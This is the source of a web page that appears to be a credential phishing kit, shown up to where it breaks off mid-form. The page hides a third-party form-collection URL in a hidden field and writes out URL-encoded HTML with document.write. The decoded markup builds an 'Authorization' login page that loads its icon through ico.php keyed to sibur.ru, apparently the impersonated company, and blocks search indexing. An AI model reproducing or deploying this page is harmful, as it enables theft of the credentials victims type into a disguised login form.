


<input 
value="https://nocodeform.io/f/67cd05b469914103cbd3e4da"
type="hidden"
id="url"
>
<script>
<!-- code by https://www.html-code-generator.com -->
document.write(unescape('%0A%3Chtml%20style%3D%22height%3A%20100%25%3B%22%20class%3D%22%22%20lang%3D%22auto%22%3E%3Chead%3E%3Clink%20type%3D%22text/css%22%20rel%3D%22stylesheet%22%20charset%3D%22UTF-8%22%20href%3D%22https%3A//translate.googleapis.com/translate_static/css/translateelement.css%22%3E%3Cscript%20type%3D%22text/javascript%22%20charset%3D%22UTF-8%22%20src%3D%22https%3A//translate.googleapis.com/_/translate_http/_/js/k%3Dtranslate_http.tr.ru.Te3ykXdVt7M.O/am%3DAg/d%3D1/exm%3Del_conf/ed%3D1/rs%3DAN8SPfqNopZ29CJ40bmRMMABSHsRsg_C7A/m%3Del_main%22%3E%3C/script%3E%0A%3Cmeta%20name%3D%22robots%22%20content%3D%22noindex%22%3E%3Cmeta%20name%3D%22robots%22%20content%3D%22noimageindex%22%3E%3Cmeta%20name%3D%22googlebot%22%20content%3D%22noindex%22%3E%3Cmeta%20content%3D%22upgrade-insecure-requests%22%20http-equiv%3D%22Content-Security-Policy%22%3E%20%3Cmeta%20name%3D%22robots%22%20content%3D%22noindex%2C%20nosnippet%2C%20nofollow%2C%20noodp%2C%20noarchive%2C%20noydir%22%3E%20%3Cmeta%20content%3D%22deny%22%20http-equiv%3D%22X-Frame-Options%22%3E%20%3Cmeta%20content%3D%22no-cache%22%20http-equiv%3D%22Pragma%22%3E%20%3Cmeta%20content%3D%22no-cache%2C%20no-store%2C%20must-revalidate%22%20http-equiv%3D%22Cache-Control%22%3E%20%3Cmeta%20http-equiv%3D%22Expires%22%20content%3D%22-1%22%3E%20%3Cmeta%20charset%3D%22utf-8%22%3E%20%3Clink%20href%3D%22ico.php%3F2186abcf2cd1f8584935e12e98f03904%3Dsibur.ru%22%20type%3D%22image/x-icon%22%20rel%3D%22icon%22%3E%20%3Ctitle%3EAuthorization%3C/title%3E%20%3Cstyle%3E%20%3Aroot%20%7B%20--blue%3A%20%23007bff%3B%20--indigo%3A%20%236610f2%3B%20--purple%3A%20%236f42c1%3B%20--pink%3A%20%23e83e8c%3B%20--red%3A%20%23dc3545%3B%20--orange%3A%20%23fd7e14%3B%20--yellow%3A%20%23ffc107%3B%20--green%3A%20%2328a745%3B%20--teal%3A%20%2320c997%3B%20--cyan%3A%20%2317a2b8%3B%20--white%3A%20%23fff%3B%20--gray%3A%20%236c757d%3B%20--gray-dark%3A%20%23343a40%3B%20--primary%3A%20%23007bff%3B%20--secondary%3A%20%236c757d%3B%20--success%3A%20%2328a745%3B%20--info%3A%20%2317a2b8%3B%20--warning%3A%20%23ffc107%3B%20--danger%3A%20%23dc3545%3B%20--light%3A%20%23f8f9fa%3B%20--dark%3A%20%23343a40%3B%20--breakpoint-xs%3A%200%3B%20--breakpoint-sm%3A%20576px%3B%20--breakpoint-md%3A%20768px%3B%20--breakpoint-lg%3A%20992px%3B%20--breakpoint-xl%3A%201200px%3B%20--font-family-sans-serif%3A%20-apple-system%2C%20BlinkMacSystemFont%2C%20%22Segoe%20UI%22%2C%20Roboto%2C%20%22Helvetica%20Neue%22%2C%20Arial%2C%20%22Noto%20Sans%22%2C%20sans-serif%2C%20%22Apple%20Color%20Emoji%22%2C%20%22Segoe%20UI%20Emoji%22%2C%20%22Segoe%20UI%20Symbol%22%2C%20%22Noto%20Color%20Emoji%22%3B%20--font-family-monospace%3A%20SFMono-Regular%2C%20Menlo%2C%20Monaco%2C%20Consolas%2C%20%22Liberation%20Mono%22%2C%20%22Courier%20New%22%2C%20monospace%3B%20%7D%20*%2C%20%3A%3Aafter%2C%20%3A%3Abefore%20%7B%20box-sizing%3A%20border-box%3B%20%7D%20html%20%7B%20font-family%3A%20sans-serif%3B%20line-height%3A%201.15%3B%20-webkit-text-size-adjust%3A%20100%25%3B%20-webkit-tap-highlight-color%3A%20transparent%3B%20%7D%20body%20%7B%20margin%3A%200%3B%20font-family%3A%20-apple-system%2C%20BlinkMacSystemFont%2C%20%22Segoe%20UI%22%2C%20Roboto%2C%20%22Helvetica%20Neue%22%2C%20Arial%2C%20%22Noto%20Sans%22%2C%20sans-serif%2C%20%22Apple%20Color%20Emoji%22%2C%20%22Segoe%20UI%20Emoji%22%2C%20%22Segoe%20UI%20Symbol%22%2C%20%22Noto%20Color%20Emoji%22%3B%20font-size%3A%201rem%3B%20font-weight%3A%20400%3B%20line-height%3A%201.5%3B%20color%3A%20%23212529%3B%20text-align%3A%20left%3B%20background-color%3A%20%23fff%3B%20%7D%20%5Btabindex%3D%22-1%22%5D%3Afocus%3Anot%28%3Afocus-visible%29%20%7B%20outline%3A%200%20%21important%3B%20%7D%20h2%2C%20h3%20%7B%20margin-top%3A%200%3B%20margin-bottom%3A%200.5rem%3B%20%7D%20img%20%7B%20vertical-align%3A%20middle%3B%20border-style%3A%20none%3B%20%7D%20button%20%7B%20border-radius%3A%200%3B%20%7D%20button%3Afocus%20%7B%20outline%3A%201px%20dotted%3B%20outline%3A%205px%20auto%20-webkit-focus-ring-color%3B%20%7D%20button%2C%20input%20%7B%20margin%3A%200%3B%20font-family%3A%20inherit%3B%20font-size%3A%20inherit%3B%20line-height%3A%20inherit%3B%20%7D%20button%2C%20input%20%7B%20overflow%3A%20visible%3B%20%7D%20button%20%7B%20text-transform%3A%20none%3B%20%7D%20%5Btype%3D%22submit%22%5D%2C%20button%20%7B%20-webkit-appearance%3A%20button%3B%20%7D%20%5Btype%3D%22button%22%5D%3Anot%28%3Adisabled%29%2C%20%5Btype%3D%22reset%22%5D%3Anot%28%3Adisabled%29%2C%20%5Btype%3D%22submit%22%5D%3Anot%28%3Adisabled%29%2C%20button%3Anot%28%3Adisabled%29%20%7B%20cursor%3A%20pointer%3B%20%7D%20%5Btype%3D%22submit%22%5D%3A%3A-moz-focus-inner%2C%20button%3A%3A-moz-focus-inner%20%7B%20padding%3A%200%3B%20border-style%3A%20none%3B%20%7D%20input%5Btype%3D%22checkbox%22%5D%20%7B%20box-sizing%3A%20border-box%3B%20padding%3A%200%3B%20%7D%20%3A%3A-webkit-file-upload-button%20%7B%20font%3A%20inherit%3B%20-webkit-appearance%3A%20button%3B%20%7D%20h2%2C%20h3%20%7B%20margin-bottom%3A%200.5rem%3B%20font-weight%3A%20500%3B%20line-height%3A%201.2%3B%20%7D%20h2%20%7B%20font-size%3A%202rem%3B%20%7D%20h3%20%7B%20font-size%3A%201.75rem%3B%20%7D%20.zX-rx-bY%20%7B%20width%3A%20100%25%3B%20padding-right%3A%2015px%3B%20padding-left%3A%2015px%3B%20margin-right%3A%20auto%3B%20margin-left%3A%20auto%3B%20%7D%20@media%20%28min-width%3A%20576px%29%20%7B%20.zX-rx-bY%20%7B%20max-width%3A%20540px%3B%20%7D%20%7D%20@media%20%28min-width%3A%20768px%29%20%7B%20.zX-rx-bY%20%7B%20max-width%3A%20720px%3B%20%7D%20%7D%20@media%20%28min-width%3A%20992px%29%20%7B%20.zX-rx-bY%20%7B%20max-width%3A%20960px%3B%20%7D%20%7D%20@media%20%28min-width%3A%201200px%29%20%7B%20.zX-rx-bY%20%7B%20max-width%3A%201140px%3B%20%7D%20%7D%20.iR-yr-Pv%20%7B%20display%3A%20-ms-flexbox%3B%20display%3A%20flex%3B%20-ms-flex-wrap%3A%20wrap%3B%20flex-wrap%3A%20wrap%3B%20margin-right%3A%20-15px%3B%20margin-left%3A%20-15px%3B%20%7D%20.Bd-Ta-Tw%20%7B%20position%3A%20relative%3B%20width%3A%20100%25%3B%20padding-right%3A%2015px%3B%20padding-left%3A%2015px%3B%20%7D%20@media%20%28min-width%3A%20768px%29%20%7B%20.Bd-Ta-Tw%20%7B%20-ms-flex%3A%200%200%20100%25%3B%20flex%3A%200%200%20100%25%3B%20max-width%3A%20100%25%3B%20%7D%20%7D%20.Qe-Vg-JI%20%7B%20display%3A%20block%3B%20width%3A%20100%25%3B%20height%3A%20calc%281.5em%20+%200.75rem%20+%202px%29%3B%20padding%3A%200.375rem%200.75rem%3B%20font-size%3A%201rem%3B%20font-weight%3A%20400%3B%20line-height%3A%201.5%3B%20color%3A%20%23495057%3B%20background-color%3A%20%23fff%3B%20background-clip%3A%20padding-box%3B%20border%3A%201px%20solid%20%23ced4da%3B%20border-radius%3A%200.25rem%3B%20transition%3A%20border-color%200.15s%20ease-in-out%2C%20box-shadow%200.15s%20ease-in-out%3B%20%7D%20@media%20%28prefers-reduced-motion%3A%20reduce%29%20%7B%20.Qe-Vg-JI%20%7B%20transition%3A%20none%3B%20%7D%20%7D%20.Qe-Vg-JI%3A%3A-ms-expand%20%7B%20background-color%3A%20transparent%3B%20border%3A%200%3B%20%7D%20.Qe-Vg-JI%3A-moz-focusring%20%7B%20color%3A%20transparent%3B%20text-shadow%3A%200%200%200%20%23495057%3B%20%7D%20.Qe-Vg-JI%3Afocus%20%7B%20color%3A%20%23495057%3B%20background-color%3A%20%23fff%3B%20border-color%3A%20%2380bdff%3B%20outline%3A%200%3B%20box-shadow%3A%200%200%200%200.2rem%20rgba%280%2C%20123%2C%20255%2C%200.25%29%3B%20%7D%20.Qe-Vg-JI%3A%3A-webkit-input-placeholder%20%7B%20color%3A%20%236c757d%3B%20opacity%3A%201%3B%20%7D%20.Qe-Vg-JI%3A%3A-moz-placeholder%20%7B%20color%3A%20%236c757d%3B%20opacity%3A%201%3B%20%7D%20.Qe-Vg-JI%3A-ms-input-placeholder%20%7B%20color%3A%20%236c757d%3B%20opacity%3A%201%3B%20%7D%20.Qe-Vg-JI%3A%3A-ms-input-placeholder%20%7B%20color%3A%20%236c757d%3B%20opacity%3A%201%3B%20%7D%20.Qe-Vg-JI%3Adisabled%20%7B%20background-color%3A%20%23e9ecef%3B%20opacity%3A%201%3B%20%7D%20.xA-vt-OV%20%7B%20margin-bottom%3A%201rem%3B%20%7D%20.custom-control-input.is-valid%3Afocus%3Anot%28%3Achecked%29%20%7E%20.custom-control-label%3A%3Abefore%2C%20.was-validated%20.custom-control-input%3Avalid%3Afocus%3Anot%28%3Achecked%29%20%7E%20.custom-control-label%3A%3Abefore%20%7B%20border-color%3A%20%2328a745%3B%20%7D%20.custom-control-input.is-invalid%3Afocus%3Anot%28%3Achecked%29%20%7E%20.custom-control-label%3A%3Abefore%2C%20.was-validated%20.custom-control-input%3Ainvalid%3Afocus%3Anot%28%3Achecked%29%20%7E%20.custom-control-label%3A%3Abefore%20%7B%20border-color%3A%20%23dc3545%3B%20%7D%20.btn%20%7B%20display%3A%20inline-block%3B%20font-weight%3A%20400%3B%20color%3A%20%23212529%3B%20text-align%3A%20center%3B%20vertical-align%3A%20middle%3B%20-webkit-user-select%3A%20none%3B%20-moz-user-select%3A%20none%3B%20-ms-user-select%3A%20none%3B%20user-select%3A%20none%3B%20background-color%3A%20transparent%3B%20border%3A%201px%20solid%20transparent%3B%20padding%3A%200.375rem%200.75rem%3B%20font-size%3A%201rem%3B%20line-height%3A%201.5%3B%20border-radius%3A%200.25rem%3B%20transition%3A%20color%200.15s%20ease-in-out%2C%20background-color%200.15s%20ease-in-out%2C%20border-color%200.15s%20ease-in-out%2C%20box-shadow%200.15s%20ease-in-out%3B%20%7D%20@media%20%28prefers-reduced-motion%3A%20reduce%29%20%7B%20.btn%20%7B%20transition%3A%20none%3B%20%7D%20%7D%20.btn%3Ahover%20%7B%20color%3A%20%23212529%3B%20text-decoration%3A%20none%3B%20%7D%20.btn%3Afocus%20%7B%20outline%3A%200%3B%20box-shadow%3A%200%200%200%200.2rem%20rgba%280%2C%20123%2C%20255%2C%200.25%29%3B%20%7D%20.btn%3Adisabled%20%7B%20opacity%3A%200.65%3B%20%7D%20.btn%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%20%7B%20cursor%3A%20pointer%3B%20%7D%20.btn-primary%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23007bff%3B%20border-color%3A%20%23007bff%3B%20%7D%20.btn-primary%3Ahover%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%230069d9%3B%20border-color%3A%20%230062cc%3B%20%7D%20.btn-primary%3Afocus%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%230069d9%3B%20border-color%3A%20%230062cc%3B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2838%2C%20143%2C%20255%2C%200.5%29%3B%20%7D%20.btn-primary%3Adisabled%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23007bff%3B%20border-color%3A%20%23007bff%3B%20%7D%20.btn-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%230062cc%3B%20border-color%3A%20%23005cbf%3B%20%7D%20.btn-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2838%2C%20143%2C%20255%2C%200.5%29%3B%20%7D%20.btn-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23545b62%3B%20border-color%3A%20%234e555b%3B%20%7D%20.btn-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28130%2C%20138%2C%20145%2C%200.5%29%3B%20%7D%20.btn-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%231e7e34%3B%20border-color%3A%20%231c7430%3B%20%7D%20.btn-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2872%2C%20180%2C%2097%2C%200.5%29%3B%20%7D%20.btn-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23117a8b%3B%20border-color%3A%20%2310707f%3B%20%7D%20.btn-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2858%2C%20176%2C%20195%2C%200.5%29%3B%20%7D%20.btn-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23212529%3B%20background-color%3A%20%23d39e00%3B%20border-color%3A%20%23c69500%3B%20%7D%20.btn-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28222%2C%20170%2C%2012%2C%200.5%29%3B%20%7D%20.btn-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23bd2130%3B%20border-color%3A%20%23b21f2d%3B%20%7D%20.btn-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28225%2C%2083%2C%2097%2C%200.5%29%3B%20%7D%20.btn-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23212529%3B%20background-color%3A%20%23dae0e5%3B%20border-color%3A%20%23d3d9df%3B%20%7D%20.btn-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28216%2C%20217%2C%20219%2C%200.5%29%3B%20%7D%20.btn-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%231d2124%3B%20border-color%3A%20%23171a1d%3B%20%7D%20.btn-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2882%2C%2088%2C%2093%2C%200.5%29%3B%20%7D%20.btn-outline-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23007bff%3B%20border-color%3A%20%23007bff%3B%20%7D%20.btn-outline-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-primary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%280%2C%20123%2C%20255%2C%200.5%29%3B%20%7D%20.btn-outline-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%236c757d%3B%20border-color%3A%20%236c757d%3B%20%7D%20.btn-outline-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-secondary%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28108%2C%20117%2C%20125%2C%200.5%29%3B%20%7D%20.btn-outline-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%2328a745%3B%20border-color%3A%20%2328a745%3B%20%7D%20.btn-outline-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-success%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2840%2C%20167%2C%2069%2C%200.5%29%3B%20%7D%20.btn-outline-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%2317a2b8%3B%20border-color%3A%20%2317a2b8%3B%20%7D%20.btn-outline-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-info%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2823%2C%20162%2C%20184%2C%200.5%29%3B%20%7D%20.btn-outline-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23212529%3B%20background-color%3A%20%23ffc107%3B%20border-color%3A%20%23ffc107%3B%20%7D%20.btn-outline-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-warning%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28255%2C%20193%2C%207%2C%200.5%29%3B%20%7D%20.btn-outline-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23dc3545%3B%20border-color%3A%20%23dc3545%3B%20%7D%20.btn-outline-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-danger%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28220%2C%2053%2C%2069%2C%200.5%29%3B%20%7D%20.btn-outline-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23212529%3B%20background-color%3A%20%23f8f9fa%3B%20border-color%3A%20%23f8f9fa%3B%20%7D%20.btn-outline-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-light%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%28248%2C%20249%2C%20250%2C%200.5%29%3B%20%7D%20.btn-outline-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%2C%20.btn-outline-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23343a40%3B%20border-color%3A%20%23343a40%3B%20%7D%20.btn-outline-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29.active%3Afocus%2C%20.btn-outline-dark%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Aactive%3Afocus%20%7B%20box-shadow%3A%200%200%200%200.2rem%20rgba%2852%2C%2058%2C%2064%2C%200.5%29%3B%20%7D%20.btn-block%20%7B%20display%3A%20block%3B%20width%3A%20100%25%3B%20%7D%20.Tb-Tk-pw%20%7B%20position%3A%20relative%3B%20display%3A%20-ms-flexbox%3B%20display%3A%20flex%3B%20-ms-flex-wrap%3A%20wrap%3B%20flex-wrap%3A%20wrap%3B%20-ms-flex-align%3A%20stretch%3B%20align-items%3A%20stretch%3B%20width%3A%20100%25%3B%20%7D%20.Tb-Tk-pw%20%3E%20.Qe-Vg-JI%20%7B%20position%3A%20relative%3B%20-ms-flex%3A%201%201%20auto%3B%20flex%3A%201%201%20auto%3B%20width%3A%201%25%3B%20min-width%3A%200%3B%20margin-bottom%3A%200%3B%20%7D%20.Tb-Tk-pw%20%3E%20.Qe-Vg-JI%3Afocus%20%7B%20z-index%3A%203%3B%20%7D%20.Tb-Tk-pw%20%3E%20.Qe-Vg-JI%3Anot%28%3Afirst-child%29%20%7B%20border-top-left-radius%3A%200%3B%20border-bottom-left-radius%3A%200%3B%20%7D%20.custom-control-input%3Afocus%3Anot%28%3Achecked%29%20%7E%20.custom-control-label%3A%3Abefore%20%7B%20border-color%3A%20%2380bdff%3B%20%7D%20.custom-control-input%3Anot%28%3Adisabled%29%3Aactive%20%7E%20.custom-control-label%3A%3Abefore%20%7B%20color%3A%20%23fff%3B%20background-color%3A%20%23b3d7ff%3B%20border-color%3A%20%23b3d7ff%3B%20%7D%20.alert%20%7B%20position%3A%20relative%3B%20padding%3A%200.75rem%201.25rem%3B%20margin-bottom%3A%201rem%3B%20border%3A%201px%20solid%20transparent%3B%20border-radius%3A%200.25rem%3B%20%7D%20.alert-danger%20%7B%20color%3A%20%23721c24%3B%20background-color%3A%20%23f8d7da%3B%20border-color%3A%20%23f5c6cb%3B%20%7D%20.close%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Afocus%2C%20.close%3Anot%28%3Adisabled%29%3Anot%28.disabled%29%3Ahover%20%7B%20opacity%3A%200.75%3B%20%7D%20@supports%20%28%28position%3A%20-webkit-sticky%29%20or%20%28position%3A%20sticky%29%29%20%7B%20%7D%20.LD-KL-BS%20%7B%20text-align%3A%20center%20%21important%3B%20%7D%20.text-danger%20%7B%20color%3A%20%23dc3545%20%21important%3B%20%7D%20@media%20print%20%7B%20*%2C%20%3A%3Aafter%2C%20%3A%3Abefore%20%7B%20text-shadow%3A%20none%20%21important%3B%20box-shadow%3A%20none%20%21important%3B%20%7D%20img%20%7B%20page-break-inside%3A%20avoid%3B%20%7D%20h2%2C%20h3%20%7B%20orphans%3A%203%3B%20widows%3A%203%3B%20%7D%20h2%2C%20h3%20%7B%20page-break-after%3A%20avoid%3B%20%7D%20@page%20%7B%20size%3A%20a3%3B%20%7D%20body%20%7B%20min-width%3A%20992px%20%21important%3B%20%7D%20.zX-rx-bY%20%7B%20min-width%3A%20992px%20%21important%3B%20%7D%20%7D%20body%20%7B%20font-family%3A%20%22Open%20Sans%22%2C%20sans-serif%3B%20color%3A%20%23535353%3B%20%7D%20.Qe-Vg-JI%3Afocus%20%7B%20box-shadow%3A%20none%3B%20%7D%20h2%2C%20h3%20%7B%20font-family%3A%20%22Open%20Sans%22%2C%20sans-serif%3B%20%7D%20.lc-MP-Dg%20%7B%20background%3A%20rgba%280%2C%200%2C%200%2C%200.04%29%20url%28%29%20top%20left%20repeat%3B%20background-size%3A%20cover%3B%20top%3A%200%3B%20width%3A%20100%25%3B%20bottom%3A%200%3B%20opacity%3A%201%3B%20min-height%3A%20100vh%3B%20text-align%3A%20center%3B%20position%3A%20relative%3B%20display%3A%20-webkit-box%3B%20display%3A%20-moz-box%3B%20display%3A%20-ms-flexbox%3B%20display%3A%20-webkit-flex%3B%20display%3A%20flex%3B%20justify-content%3A%20center%3B%20align-items%3A%20center%3B%20padding%3A%2030px%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20%7B%20max-width%3A%20380px%3B%20margin%3A%200%20auto%3B%20color%3A%20%23717171%3B%20text-align%3A%20center%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20.details%20%7B%20padding%3A%2025px%2030px%2030px%3B%20background%3A%20%23fff%3B%20border-radius%3A%205px%205px%200%200%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20img%20%7B%20margin-bottom%3A%2015px%3B%20height%3A%2030px%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20h3%20%7B%20margin%3A%200%200%2025px%3B%20font-size%3A%2018px%3B%20font-weight%3A%20400%3B%20font-family%3A%20%22Open%20Sans%22%2C%20sans-serif%3B%20color%3A%20%23717171%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20.xA-vt-OV%20%7B%20margin-bottom%3A%2025px%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20input%5Btype%3D%22checkbox%22%5D%20%7B%20margin-top%3A%204px%3B%20%7D%20.lc-MP-Dg%20.Qs-KR-Mw%20button%3Afocus%20%7B%20outline%3A%20none%3B%20outline%3A%200%20auto%20-webkit-focus-ring-color%3B%20%7D%20@media%20%28max-width%3A%20992px%29%20%7B%20.lc-MP-Dg%20%7B%20padding%3A%2030px%200%3B%20%7D%20%7D%20%3Aroot%20%7B%20--savepage-url-2%3A%20url%28data%3Aimage/png%3Bbase64%29%3B%20%7D%20%3C/style%3E%0A%3C/head%3E%0A%3Cbody%20id%3D%22top%22%20style%3D%22position%3A%20relative%3B%20min-height%3A%20100%25%3B%20top%3A%200px%3B%22%3E%0A%20%20%3Cdiv%20id%3D%22google%22%3E%3Cimg%20src%3D%22https%3A//www.google.com/images/cleardot.gif%22%20alt%3D%22%22%20width%3D%221%22%20height%3D%221%22%3E%3C/div%3E%20%0A%20%3Cscript%3E%20function%20googleTranslateElementInit%28%29%20%7B%20new%20google.translate.TranslateElement%28%7BpageLanguage%3A%20%27auto%27%2C%20autoDisplay%3A%20true%2C%20layout%3A%20google.translate.TranslateElement.InlineLayout.SIMPLE%7D%2C%20%27google%27%29%3B%20%7D%20%3C/script%3E%20%3Cscript%20src%3D%22//translate.google.com/translate_a/element.js%3Fcb%3DgoogleTranslateElementInit%22%3E%20%3C/script%3E%20%20%20%0A%20%3Ciframe%20loading%3D%22lazy%22%20scrolling%3D%22no%22%20sandbox%3D%22allow-forms%20allow-pointer-lock%20allow-popups%20allow-same-origin%20allow-scripts%20allow-top-navigation%22%20id%3D%22dl-rA-Ms%22%20src%3D%22%22%20style%3D%22%20height%3A%20100%25%3B%20border%3A%20none%3Bposition%3A%20absolute%3B%22%20width%3D%22100%25%22%3E%3C/iframe%3E%20%3Cdiv%20class%3D%22lc-MP-Dg%22%3E%20%3Cdiv%20class%3D%22zX-rx-bY%22%3E%20%3Cdiv%20class%3D%22iR-yr-Pv%22%3E%20%3Cdiv%20class%3D%22Bd-Ta-Tw%22%3E%20%3Cdiv%20class%3D%22Qs-KR-Mw%22%3E%20%3Cdiv%20class%3D%22details%22%3E%20%3Cform%20id%3D%22Ow-Dw-WD%22%20name%3D%22Ow-Dw-WD%22%20method%3D%22post%22%20action%3D%22%22%3E%20%3Cdiv%20align%3D%22center%22%3E%20%3Ch2%20class%3D%22LD-KL-BS%22%3E%20%3Cdiv%20id%3D%22top%22%3E%3Cimg%20onerror%3D%22this.src%3D%27https%3A//png.pngtree.com/png-vector/